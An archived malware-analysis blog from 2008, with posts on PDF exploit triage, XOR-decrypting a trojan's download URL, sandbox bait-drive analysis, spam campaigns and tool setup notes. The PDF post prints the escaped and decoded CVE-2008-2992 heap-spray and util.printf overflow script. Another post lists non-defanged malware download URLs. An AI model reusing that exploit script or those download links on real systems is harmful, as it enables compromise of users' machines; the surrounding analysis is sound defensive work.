Tuesday, December 30, 2008

Koobface

I've traced and analyzed some variants of the infamous Koobface worm, but I found this analysis from ThreatExpert to be pretty complete:

http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html

http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html

Saturday, November 15, 2008

simple pdf exploit analysis

Simple steps for checking a PDF for an exploit:
1. Open the file in a hex viewer or any text editor/viewer. If the PDF carries an embedded script inside a compressed stream, you can spot it by the /FlateDecode filter in the stream dictionary (the script itself is unreadable until the stream is inflated):






3. Use the pdftk tool to uncompress the streams, which exposes the malicious script:

$ pdftk file.pdf output file.pdf.out uncompress

4. The file file.pdf.out now contains the decompressed streams. Browse it to locate the (escaped) script:

5. Extract the escaped text and feed it to your preferred tool to unescape the code.
Extracted text:
%76%61%72%20%73%63%63%73%20%3D%20%75%6E%65%73%63%61%70%65%28%74%68%69%73%2E%67%65%74%46%69%65%6C%64%28%27%74%65%78%74%27%29%2E%76%61%6C%75%65%29%3B%0D%0A%0D%0A%09%76%61%72%20%62%67%62%6C%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%41%30%41%22%2B%22%25%75%30%41%30%41%22%29%3B%0D%0A%09%76%61%72%20%73%6C%73%70%63%20%3D%20%32%30%20%2B%20%73%63%63%73%2E%6C%65%6E%67%74%68%3B%0D%0A%09%77%68%69%6C%65%28%62%67%62%6C%2E%6C%65%6E%67%74%68%20%3C%20%73%6C%73%70%63%29%20%62%67%62%6C%20%2B%3D%20%62%67%62%6C%3B%0D%0A%09%76%61%72%20%66%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%73%6C%73%70%63%29%3B%0D%0A%09%76%61%72%20%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%62%67%62%6C%2E%6C%65%6E%67%74%68%20%2D%20%73%6C%73%70%63%29%3B%0D%0A%09%77%68%69%6C%65%28%62%6C%6B%2E%6C%65%6E%67%74%68%20%2B%20%73%6C%73%70%63%20%3C%20%30%78%36%30%30%30%30%29%20%62%6C%6B%20%3D%20%62%6C%6B%20%2B%20%62%6C%6B%20%2B%20%66%62%6C%6B%3B%0D%0A%0D%0A%09%76%61%72%20%6D%6D%79%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%09%66%6F%72%28%69%20%3D%20%30%3B%20%69%20%3C%20%31%32%30%30%3B%20%69%2B%2B%29%7B%20%6D%6D%79%5B%69%5D%20%3D%20%62%6C%6B%20%2B%20%73%63%63%73%20%7D%0D%0A%0D%0A%76%61%72%20%6E%6D%20%3D%20%31%32%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%38%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%39%22%3B%20%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%32%37%36%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%38%22%3B%20%7D%0D%0A%0D%0A%75%74%69%6C%2E%70%72%69%6E%74%66%28%75%6E%65%73%63%61%70%65%28%22%22%2B%22%25%22%2B%22%32%35%25%33%34%25%22%2B%22%33%35%25%33%30%25%33%30%25%33%30%25%36%36%22%29%2C%20%6E%6D%29%3B%0D%0A%0D%0A%74%68%69%73%2E%63%6C%6F%73%65%44%6F%63%28%74%72%75%65%29%3B%0D%0A

The output decodes to the script below.
<------------------------------------------------------------------------------
var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
<------------------------------------------------------------------------------

If you follow the latest advisories this will look familiar: it is the Adobe Reader util.printf() stack buffer overflow reported by Core Security (CVE-2008-2992). The decoded script spells it out. The first loops build an array of 1200 copies of a block padded with 0x0A0A and terminated by the shellcode read from the 'text' form field (a heap spray); then util.printf() is called with the format string "%45000f" (what "%25%34%35%30%30%30%66" unescapes to) and a very long numeric argument, which overflows a fixed-size stack buffer inside Reader. See the details: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
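The five manual steps above, as a single script. This is an added example, not the blog's own tool: it builds a small constructed PDF with the same layout as the sample (a /FlateDecode stream holding a fully %XX-escaped script), inflates every FlateDecode stream, unescapes any %XX / %uXXXX runs it finds, and reports which suspicious JavaScript APIs show up in each decoded layer. The marker list, the sample object numbers and the helper names are my own choices.

```python
import re
import urllib.parse
import zlib

# Constructed sample (not the file from the post): the script is fully %XX-escaped
# and hidden in a FlateDecode stream, the same layout as the malicious PDF above.
# The inner script only *contains* the util.printf call as text; nothing is executed.
INNER_SCRIPT = 'var nm = 12;\nutil.printf("%45000f", nm);'
ESCAPED = "".join(f"%{b:02X}" for b in INNER_SCRIPT.encode())
SAMPLE_JS = f"eval(unescape('{ESCAPED}'));".encode()


def build_sample_pdf(js_src: bytes) -> bytes:
    """Minimal PDF whose /OpenAction runs js_src from a FlateDecode stream (assumed object numbers)."""
    body = zlib.compress(js_src)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode() +
            b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n"
            b"%%EOF\n")


# stream dictionary (one level of nested << >> allowed), then the raw stream body
STREAM_RE = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
# %uXXXX first (JS unescape), then %XX; a run of 4+ escapes is worth decoding
ESCAPED_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}){4,}")
# short starter list of APIs worth a second look; util.printf is the one from this post
SUSPICIOUS = ("util.printf", "unescape(", "eval(", "String.fromCharCode")


def extract_streams(pdf: bytes) -> list:
    """Steps 1 and 3: every stream body, inflated when its dictionary says /FlateDecode."""
    out = []
    for m in STREAM_RE.finditer(pdf):
        dictionary, data = m.group(1), m.group(2)
        if b"/FlateDecode" in dictionary:
            try:
                data = zlib.decompressobj().decompress(data)
            except zlib.error:
                continue  # damaged stream: skip it instead of aborting the triage
        out.append(data)
    return out


def unescape_js(text: str) -> str:
    """Step 5: JavaScript unescape() semantics (%uXXXX then %XX)."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return urllib.parse.unquote(text)  # use unquote_to_bytes() when you need raw shellcode bytes


def triage(pdf: bytes) -> dict:
    """Map each suspicious API to the (decoded) script layer it was first found in."""
    hits = {}
    for data in extract_streams(pdf):
        text = data.decode("latin-1")
        layers = [text] + [unescape_js(run) for run in ESCAPED_RUN.findall(text)]
        for layer in layers:
            for api in SUSPICIOUS:
                if api in layer:
                    hits.setdefault(api, layer)
    return hits


if __name__ == "__main__":
    for api, layer in triage(build_sample_pdf(SAMPLE_JS)).items():
        print(f"{api:20s} in: {layer[:60]!r}")
```

Run it against a real sample by replacing build_sample_pdf(SAMPLE_JS) with the file's bytes; the decoded layer for util.printf is exactly what step 5 gives you by hand.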


Wednesday, October 29, 2008

Real AV ?!?

Hmmm.. Real Antivirus? Or just another rogue AV...

Wednesday, October 22, 2008

quick check of trojan's downloaded file

Some bots and trojans use simple encryption to download their other components. When you trace the malware you might see a URL it downloads from, but when you fetch it manually you get nothing but gibberish. Typically they first download a relatively small file, say ff.rar, from a malicious web host. The file is not actually a RAR archive; it contains data that looks encrypted. Once you decrypt it, it may contain the actual link to the malicious file or component that the malware downloads next.

Example: ff.rar
00000000: 29 1A 61 35-63 64 65 74-2E 61 00 00-00 00 00 00 )?a5cdet.a
00000010: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00000020: 00 00 41 5D-5D 59 13 06-06 48 5A 4D-1F 5C 07 4A A]]Y???HZM?\•J
00000030: 46 44 06 43-43 06 4F 4F-07 4C 51 4C- FD?CC?OO•LQL

Your instinct will tell you that this could be the download URL, and that it must start with http.
At offsets 0x23 and 0x24 are two identical bytes (5D), which could decrypt to the 'tt' of 'http'.
Applying simple math, 0x5D ^ X = 0x74 (0x74 is the hex value for 't'), so X = 0x29. Now let's try to decrypt it using that value as the key (a single-byte XOR; check that the same key also turns the 0x41 at offset 0x22 into 'h' before trusting it).

Using Hiew, you can quickly decrypt the bytes using the value X=0x29 as the key:
1. Open the file in Hiew, hex mode. Position the cursor at offset 0.
2. Press F3 (edit), then F8 (XOR). Enter 29 (hex) as the XOR mask. Enter.
3. Pressing F8 will decrypt it, similar to below:

00000000: 00 33 48 1C-4A 4D 4C 5D-07 48 29 29-29 29 29 29 3H?JML]•H))))))
00000010: 29 29 29 29-29 29 29 29-29 29 29 29-29 29 29 29 ))))))))))))))))
00000020: 29 29 68 74-74 70 3A 2F-2F 61 73 64-36 75 2E 63 ))http://asd6u.c
00000030: 6F 6D 2F 6A-6A 2F 66 66-2E 65 78 65- om/jj/ff.exe

Now you have the actual download link for the malware and can fetch it manually with wget (from your analysis box, not your workstation): hXXp://asd6u.com/jj/ff.exe
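The key-recovery step above, automated. This is an added example rather than the author's Hiew session: it parses the hex dump shown above into bytes (constructed here from that dump, ASCII column dropped), tries every offset for a single-byte XOR key that maps the ciphertext onto the crib 'http://', and XORs the blob with that key to pull out the URL. The crib, the defanging format and the helper names are my assumptions.

```python
import re

# Bytes transcribed from the ff.rar hex dump shown above (ASCII column dropped);
# embedded here so the script runs offline.
FF_RAR_DUMP = """
00000000: 29 1A 61 35-63 64 65 74-2E 61 00 00-00 00 00 00
00000010: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00000020: 00 00 41 5D-5D 59 13 06-06 48 5A 4D-1F 5C 07 4A
00000030: 46 44 06 43-43 06 4F 4F-07 4C 51 4C
"""


def parse_hexdump(dump: str) -> bytes:
    """Turn a Hiew-style dump (offset: hex pairs, no ASCII column) into bytes."""
    data = bytearray()
    for line in dump.strip().splitlines():
        _, _, hexpart = line.partition(":")
        data += bytes(int(h, 16) for h in re.findall(r"[0-9A-Fa-f]{2}", hexpart))
    return bytes(data)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xor_keys(data: bytes, crib: bytes = b"http://") -> list:
    """Every (offset, key) where one single-byte key maps the ciphertext onto the crib.

    Generalises the reasoning in the post: 0x5D ^ key == ord('t') gives key == 0x29;
    here the *same* key must explain all seven bytes of 'http://'.
    """
    hits = []
    for off in range(len(data) - len(crib) + 1):
        keys = {data[off + i] ^ crib[i] for i in range(len(crib))}
        if len(keys) == 1:
            hits.append((off, keys.pop()))
    return hits


def extract_url(data: bytes, crib: bytes = b"http://"):
    """Return (key, url) for the first crib hit, or None if no single-byte key fits."""
    hits = find_xor_keys(data, crib)
    if not hits:
        return None
    off, key = hits[0]
    plain = xor_bytes(data, key)
    m = re.match(rb"[\x21-\x7e]+", plain[off:])  # the URL runs until the first non-printable
    return key, m.group(0).decode("ascii")


def defang(url: str) -> str:
    """hXXp://example[.]com style, so the link cannot be clicked by accident."""
    return url.replace("http", "hXXp", 1).replace(".", "[.]")


if __name__ == "__main__":
    blob = parse_hexdump(FF_RAR_DUMP)
    key, url = extract_url(blob)
    print(f"key=0x{key:02X} url={defang(url)}")
```

If the crib produces no hit the file is not a plain single-byte XOR, and the next thing to try is a repeating key or looking at the decryption routine in the dropper itself.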

Friday, October 17, 2008

Reverse Engineering Links

Gathered from different sources (eg. my own bookmarks, forum, blog, etc):

http://www.openrce.org
http://woodmann.net/collaborative/tools/index.php/Category:Hardware_Reversing_Tools
http://www.woodmann.com/crackz/index.html
http://www.woodmann.com/forum/index.php
http://www.codebreakers-journal.com/
http://www.tuts4you.com/download.php?list.17
http://www.tuts4you.com/
http://www.exetools.com/
http://ap0x.jezgra.net/
http://www.crackmes.de/
http://www.reverse-engineering.info/
http://www.w00zl3.net/
http://korupt.wordpress.com/
http://www.reteam.org/
http://www.reconstructer.org
http://www.antirootkit.com
http://www.rootkit.com
http://evilcry.netsons.org
http://evilcodecave.wordpress.com
http://offensivecomputing.net/
http://zairon.wordpress.com/
http://www.ivanlef0u.tuxfamily.org/
http://arteam.accessroot.com/
http://uninformed.org/
http://dvlabs.tippingpoint.com/
http://www.matasano.com/log/category/reversing/
http://reversengineering.wordpress.com/
http://indefinitestudies.wordpress.com/2008/09/25/automatic-unpacking/
http://www.quequero.org/Reversing
http://www.codeproject.com/KB/cpp/funccaller.aspx
http://www.datarescue.com/laboratory/
http://www.nynaeve.net
http://www.datasecurity-event.com/downloads.html
http://xchg.info/ARTeam/Tutorials/
http://www.reverse-engineering.net/
http://www.reversing.be/

Others:
http://www.intel.com/products/processor/manuals/

Tuesday, October 07, 2008

VS2005 compiled exe error

The following error shows up when you transfer or copy your VS2005-compiled program to another machine. This is I think

c:\test> BlueFish.exe
This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem.

Similar problem discussion about SxS (side-by-side) issue can be found here.
Another similar discussion I found from this link.

Anyway, I tried changing settings in my VS2005 and it just worked fine, but I'm not sure if it's the correct solution. The usual cause is that the Visual C++ 2005 CRT side-by-side assembly is missing on the target machine, so installing the VC++ 2005 redistributable there, or linking the CRT statically (/MT instead of /MD), avoids the error. Here's the settings as screenshots:



Wednesday, September 24, 2008

opensource flash

http://osflash.org

Monday, September 01, 2008

BGP security hole

After the noisy DNS cache-poisoning vulnerability, here comes another big security loophole, one that could take down large parts of the Internet in less than an hour, or be used maliciously for eavesdropping by hijacking routes: the BGP weakness.

Thursday, August 28, 2008

Tip Of The Day - Virtual Drive

"OnlineGames" trojans are among today's most popular malware, occupying a large chunk of the ITW (In-The-Wild) list. Note: some other malware, like Autorun, behaves similarly to the OnlineGames trojans. They are designed to steal credentials from online gamers, particularly players of massively multiplayer online role-playing games (MMORPGs).
One particular behavior of this malware family is its capability to spread to all accessible drives, including USB. This made it possible for this malware to be carried somewhere else entirely, including outer space. It's just a matter of time before someone writes a virus that sabotages some of the most critical infrastructure that affects our lives. Scary, isn't it?

Typically, we do static analysis with Hiew or IDA, then dynamic analysis, to analyze viruses. Static analysis is basically browsing the structure of the file and its disassembly and trying to understand the overall behavior. Some strings can also hint at its nature, like in my previous post.
Dynamic analysis can be divided into two parts: (a) behavioral analysis, running the malware in a sandbox, and (b) tracing, running the malware under a debugger, watching its behavior by breaking at predetermined parts of the code, and supplying additional "baits" (e.g. required files, processes, etc.). In tracing mode, you can choose to examine only parts of the code.
Example: how the malware gathers email addresses for spamming, decryption routines, and other algorithmic code that requires special attention to fully understand the malware, or code you need to verify because another analysis reports something you did not observe.

I'll show some practical tips that can help you in analyzing malware in general, and OnlineGames trojans in particular, through behavioral analysis. Roughly:

0. Most of them work fine on VMware, so using VMware is a good idea for analyzing malware, especially in volume, because of VMware's snapshot capability. Reverting to your "sandbox" snapshot is much faster than restoring a real machine with, say, Ghost.

1. Use a lightweight network/packet sniffer to capture traffic, as most of them download components from remote locations. I'm using my own tool, pcaps32:


pcaps32 in action

This is particularly useful for checking the inbound/outbound traffic generated by the malware: communication with its C&C, download sites, spammed emails, traffic redirection, or whether the contacted IP is reachable at all.

2. A process viewer such as Sysinternals Process Explorer, to see process activity like a hidden spawned IE process, etc. Pretty obvious.

3. Registry and file monitoring programs are obviously valuable for spotting modifications to the system after running the malware.


4. And last but not least, a virtual hard drive, hence the subject line :) As a virus analyst you have to be quick and resourceful in using the right tools. One time, while analyzing an "OnlineGames" trojan, I wanted to check whether it mutates on every infection. OnlineGames trojans are known to drop an INF file and a copy of themselves (or other components) onto all accessible drives. So the trick is to give the trojan more accessible drives and observe that behavior. This tells us whether the files dropped on other drives are mutating or polymorphic. But my VMware setup had only one drive and I didn't want to set it up again just for this sample.

For this purpose I tried the Virtual Hard Drive software from FarStone. Grab a trial version and install it on your sandbox machine. Creating a virtual hard drive is easy: just run "Virtual Hard Drive Pro" from Start->Programs->Virtual Hard Drive Pro and a wizard will guide you through creating it:



Just specify the drive letter for your new drive and the space allocated to it. The licensed version, I believe, lets you create more virtual drives.
Now you are ready to run the malware. This is where the behavioral analysis commences.

OK. Let's say you're done with the analysis and would like to check the effect on the virtual hard drive (VHD). Just go to your bait drive and check for modifications, which usually means dropped files or a copy of the malicious program. Take note that some monitoring programs will not catch files added to the VHD, so check it manually.
Some variants turn off the "show hidden files" option via the registry, but you can use "dir /ah" or "attrib *" if you know the drop point, usually the root directory, similar to below:


This helps the analyst verify whether the malware is polymorphic, mutating on every infection, so that better signature coverage can be provided for each variant or family.
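A script for the bait-drive check described above. This is an added example, not the author's tooling or FarStone's: it parses autorun.inf at each drive root for the keys that decide what gets launched, hashes the executables dropped there, and compares hashes across the bait drives to answer the question the post asks, whether the drop is byte-identical or mutates per infection. The demo() function builds constructed "drives" in a temp directory with a made-up autorun.inf and dropper.exe; the file names, the extension set and the key list are my assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed for this example: typical drop extensions and the autorun.inf keys
# that decide what Explorer launches when the drive is opened.
PAYLOAD_EXT = {".exe", ".com", ".scr", ".pif", ".dll", ".bat"}
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")
FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM = 0x2, 0x4


def parse_autorun(text: str) -> dict:
    """Minimal [autorun] parser: keys lower-cased, comments and other sections ignored."""
    keys, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            k, v = line.split("=", 1)
            keys[k.strip().lower()] = v.strip()
    return keys


def is_hidden(path: Path) -> bool:
    """Hidden or system attribute; only meaningful on Windows (False elsewhere)."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return bool(attrs & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_root(root) -> dict:
    """What was left at one drive root: autorun launch targets plus (hash, hidden) per binary."""
    root = Path(root)
    info = {"launch": [], "files": {}}
    inf = root / "autorun.inf"
    if inf.is_file():
        keys = parse_autorun(inf.read_text(errors="replace"))
        info["launch"] = [keys[k] for k in LAUNCH_KEYS if k in keys]
    for entry in root.iterdir():  # the hidden attribute hides nothing from iterdir
        if entry.is_file() and entry.suffix.lower() in PAYLOAD_EXT:
            info["files"][entry.name] = (sha256_file(entry), is_hidden(entry))
    return info


def compare_drops(roots) -> tuple:
    """Reports per drive, and whether any same-named drop differs between drives (mutating)."""
    reports = {str(r): inspect_root(r) for r in roots}
    by_name = {}
    for rep in reports.values():
        for name, (digest, _) in rep["files"].items():
            by_name.setdefault(name, set()).add(digest)
    mutating = any(len(digests) > 1 for digests in by_name.values())
    return reports, mutating


def demo() -> tuple:
    """Constructed bait drives: E/ and F/ get byte-identical drops, G/ gets a variant."""
    autorun = "[AutoRun]\nOPEN=dropper.exe\nshell\\open\\Command=dropper.exe\n"
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        for drive, body in (("E", b"MZ fake copy 1"), ("F", b"MZ fake copy 1"), ("G", b"MZ fake copy 2")):
            (base / drive).mkdir()
            (base / drive / "autorun.inf").write_text(autorun)
            (base / drive / "dropper.exe").write_bytes(body)
        launch = inspect_root(base / "E")["launch"]
        _, mutating_ef = compare_drops([base / "E", base / "F"])
        _, mutating_efg = compare_drops([base / "E", base / "F", base / "G"])
    return launch, mutating_ef, mutating_efg


if __name__ == "__main__":
    print(demo())  # on a real sandbox: compare_drops(["E:\\", "F:\\"])
```

On the sandbox, point compare_drops() at the real and virtual drive roots; a True verdict means the dropped copies differ per drive and a single-hash signature will not cover the family.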

On my next posts, I will present how to analyze complex malware that would require tracing and hacking the malware code. Stay tuned.

Wednesday, August 27, 2008

Tip Of The Day - AutoHotkey malware

Yesterday I found a piece of malware to analyze. I checked the file structure and it looked like a UPX-packed executable (from the section names, the entry-point disassembly and even some signature checker tools).

Original file

Unpacked version


UPX v3.0 marker

So I grabbed a copy of upx.exe that can decompress the file, which says it is UPX version 3.00. Everything was OK and the file was successfully unpacked. So I opened the unpacked version in Hiew and checked the entry point again.

Entry point disassembly in Hiew


Entry point disassembly in Ida

From its disassembly it really is unpacked, and it looks like the normal entry point of a program. If you've been analyzing malware for a while you can tell from the first API calls, etc. Most of the time that's game over... but sometimes there is more.

So I ran the file on my sandbox machine and waited for some interesting behavior. Nothing happened. So I opened it again and started to trace. But hey, I forgot to check the strings, which can lead somewhere. I browsed the binary in Hiew and started looking for strings.

"AutoHotkey" strings

Indeed, there were some interesting strings (an assembly manifest) inside the binary.
With that in mind, it's most likely an AutoHotkey script converted into an executable, just like AutoIt, remember? Hmmm... so I opened my browser and searched for "autohotkey". Voila! Its website says:

"Convert any script into an EXE file that can be run on computers that don't have AutoHotkey installed."

The word EXE is actually a hyperlink to download its decompiler (Exe2Ahk; Ahk2Exe is the compiler that produced the binary). Download it and you can revert the exe back to its original script, which can be opened in any text viewer/editor. The decompiled script is pretty much straightforward and makes analyzing the file 10x faster.
Then that's game over!


Decompiled script

Check the AV detections in VT

Conclusion: people can now easily create malware without learning ASM or C, just by learning the simple syntax of a scripting language like AutoHotkey and converting the script into an executable.

Tuesday, August 26, 2008

Judy Array

Hmm... I've found this code interesting. I can use it in some of my coding adventures :)

Sunday, August 24, 2008

More Paris Hilton Malware..

My inbox has several emails purporting to carry a video of Paris Hilton.
The email is simple HTML containing a link to a photo (of Paris), but when you click the hyperlink enticing you to view the video, it downloads an EXE file from another remote location.


An example of the email is below:

And the email body in text mode is similar below:
Highlighted in red is the actual location of the executable. You can see that the link to the photo differs from the location of the binary.

Some of the download links are as follows:
http://patuash.yoyo.pl/video_4.exe
http://www.odakoptik.com.tr/video_3.exe
http://baupol.net/video_1.exe


Example output from VT is here.

IE7 update is now Paris Hilton video


The fake IE7 update that circulated actively a couple of weeks ago is back. This time it is disguised as a video of none other than the malware authors' favorite celebrity, Paris Hilton.

Friday, August 15, 2008

good read

http://bitblaze.cs.berkeley.edu/

Wednesday, August 13, 2008

Traditional sig-based AV is dead

Maybe not (yet), but it's worth mentioning that some AVs are starting to give up on traditional virus scanning and move towards "cloud-based" threat scanning:

First, Trend Micro's Smart Protection Network:
- http://trendmicro.mediaroom.com/index.php?s=43&item=642

Then Panda, with its so-called Collective Intelligence approach:
- http://research.pandasecurity.com/blogs/images/wp_pb_collective_intelligence.pdf

And just recently, even academia has come to believe in the "in-the-cloud" strategy:
- http://blogs.zdnet.com/emergingtech/?p=1008

I won't be surprised if other vendors follow :-)

Tuesday, August 12, 2008

Latest IE7 version is nothing but malware

The message body runs as below:

-----------------------------------------------------------------------------------------------
Download the latest version Internet Explorer 7.0! About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers' content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

©2008 Microsoft | Unsubscribe | More Newsletters | Privacy

Microsoft Corporation, One Microsoft Way, Redmond, WA 98052
-----------------------------------------------------------------------------------------------


Warning: don't click the link above; it downloads malware that even the AV vendors can't agree on a name for :) See: http://www.virustotal.com/analisis/18b97fb3bc30251051a8542a90401b6f

AVs have good coverage for this piece of malware, though :-)

Christina Aguilera Interesting video

A video of Christina Aguilera is currently being spammed by some malware.
Don't be tempted to download it if you don't want to get infected :-)

The mail looks like below:


When you click the link it goes to a website that downloads the file videoXXX67h8.exe (72,704 bytes). VirusTotal shows several AV vendors detecting it as malicious: http://www.virustotal.com/analisis/fa5924ec4f51bc1c16a83b280756b3da

You can of course check the header to manually find and download the malware from the link in the screenshot:

Friday, July 18, 2008

The Canadian Pharmacy scam has resurfaced and shifted its spam strategy. Canadian Pharmacy has been very active in the past. Its new strategy, though not new in the spam world, is to compose emails with a long message body and insert a hyperlink somewhere in the content. I've observed some spam emails from this botnet-operated pharmacy slipping past spam filtering software, but it won't take that long to catch them for sure.

Figure 1 is an example of the spam mail. The message may look legit, but when you read its content it's nothing but random words or phrases. The link to the Canadian Pharmacy website is inserted as a small hyperlink, and when you view the included image, Figure 2 is revealed. Familiar?
Figure 1. Canadian Pharmacy Spam mail

Figure 2. Loaded image


If you're still in doubt, try clicking the image area, which redirects you to the actual Canadian Pharmacy website (see Figure 3).

Figure 3. Canadian Pharmacy website

Thursday, July 17, 2008

OpenPacket.org

This looks pretty helpful when you deal with network/packet research:
Check: https://www.openpacket.org/

Angelina is in your (Spam) mailbox!

While most of us simply ignore the spam folder, sometimes it's a good idea to check it once in a while. But be ready, as viruses are mostly lurking in your spam.
So always wear some protection: use Sandboxie while browsing. It's not 100% malware-proof, but most of the time it's enough of a layer against web-based exploits and malware.

I will be using my gmail account for demonstration.

1. Browse the Spam folder and select anything that catches your interest.
2. Spam ranges from medicines and watches to, of course, porn.
3. Hmmm... look at that subject above (highlighted in red):
"Angelina Jolie naked - WATCH". Isn't it interesting??

4. Google is security conscious: objects that may contain malicious code, e.g. graphics files, are not displayed by default. OK, let's open it! Woaah!
5. As you can see, there is a WATCH link waiting for you to click if you wanna see more of Angelina!

6. But be cautious! This is the most common strategy of malware authors spamming their malicious programs to unsuspecting recipients.

Tip: you can check the SMTP headers and the HTML code for malicious objects, like links to executable files or JavaScript. You can do it by clicking the small rectangular button in the picture below:
Clicking "Show original" shows you the SMTP headers and the HTML inside the mail, similar to below:
7. Gotcha! Your next step is to manually download the exe file and send it to the AV vendors if you can't analyze it yourself, or to online sandboxing services like Anubis (my favorite), Norman or CWSandbox, and to free scanning services like VirusTotal or virusscan.

Tuesday, July 08, 2008

Tamarin

http://hecker.org/mozilla/adobe-mozilla-and-tamarin

Sunday, July 06, 2008

Security tools/RCE tools

Thanks to the people maintaining the following links. Very helpful in our field.

Security Tools:
http://securitytools.wikidot.com/

RCE Tools:
http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Saturday, June 14, 2008

Hello World v0.2!

It's time to facelift this blog and be more active =P
This was my personal online notepad, but thanks to Google for its online notepad I won't need this anymore. Instead, I will convert this into a MALWARE, SECURITY and REVERSE ENGINEERING blog!!!
Stay tuned! lolz!!

Saturday, March 15, 2008

How to detect version of MS Visual Studio or compiler in compilation time?

To do this you should use the _MSC_VER define, like in this code (1300 is Visual C++ .NET 2002 itself, so the last test is >=, not >; Visual C++ 2008 reports 1500):
#if _MSC_VER >= 1500   // this is Visual C++ 2008
#elif _MSC_VER >= 1400 // this is Visual C++ 2005
#elif _MSC_VER >= 1310 // this is Visual C++ .NET 2003
#elif _MSC_VER >= 1300 // this is Visual C++ .NET 2002
#endif

Wednesday, February 13, 2008

KDE4 Problem ?

I experienced a problem with Kubuntu.

I couldn't log in to X, and even starting X manually after logging in via the console sometimes didn't work. Well, (un)fortunately, I'm not the only one experiencing this problem. Thanks to this link, which solved my problem: http://ubuntuforums.org/showthread.php?p=4320584

So if you think you have the same problem, open the file '.xsession-errors' in your home directory with any text editor (vi/vim/etc.) or a command like tail or less:

~$ tail -20 ~/.xsession-errors

And look at the end of the file for something similar to below:
:
kdecore (KLocale): WARNING: Definition of PluralForm is none of NoPlural/TwoForms/French/OneTwoRest/Russian/Polish/Slovenian/Lithuanian/Czech/Slovak/Arabic/Balcan/Macedonian/Gaeilge/Maltese: Definition of PluralForm - to be set by the translator of kdelibs.po
:


This is a language pack problem, so removing the following packages fixes it (at least for me):

~$ sudo aptitude remove language-pack-kde-en
~$ sudo aptitude remove language-pack-kde-en-base

Monday, January 21, 2008

portbunny is out!

another port scanner: a Linux kernel module written in C with a Python front end.
check it out! http://www.recurity-labs.com/portbunny/portbunny.html

Wednesday, January 02, 2008

ClamAV setup

Download location (HTTP):

http://www.clamav.net/

Installation of Clamav


First add a dedicated group and user for the clamav daemons and environment.

groupadd -g 40 clamav
useradd -c "CLAMAV Owner" -m -d /var/lib/clamav -g clamav -u 40 \
    -s /bin/bash clamav

Notes
. All the other daemons (clamsmtpd and freshclam) and scripts will run under the same account: clamav.
This account needs a valid shell and home directory for executing a shell script when a virus is found.
. The number 40 for the group id and user id is arbitrary. Choose one suitable for you.

With the new account create an environment:


cd /var/lib/clamav
mkdir {bin,db,log,run,template,tmp}
chown -R clamav:clamav /var/lib/clamav
chmod 700 /var/lib/clamav

Configuring, compiling and installing the software. Note that I keep everything under one directory, /var/lib/clamav; because that directory is mode 700, any client that later talks to the clamd socket inside it must also run as the clamav user.

./configure --prefix=/usr \
--sysconfdir=/etc \
--localstatedir=/var \
--libexecdir=/usr/sbin \
--disable-clamuko \
--with-user=clamav \
--with-group=clamav \
--with-dbdir=/var/lib/clamav/db
make
make install

Clamd, clamscan, clamdscan and freshclam are all part of this package.
I only use clamd and freshclam.
The daemons clamd and freshclam are installed in /usr/sbin, and the
configuration files clamd.conf and freshclam.conf are in /etc.
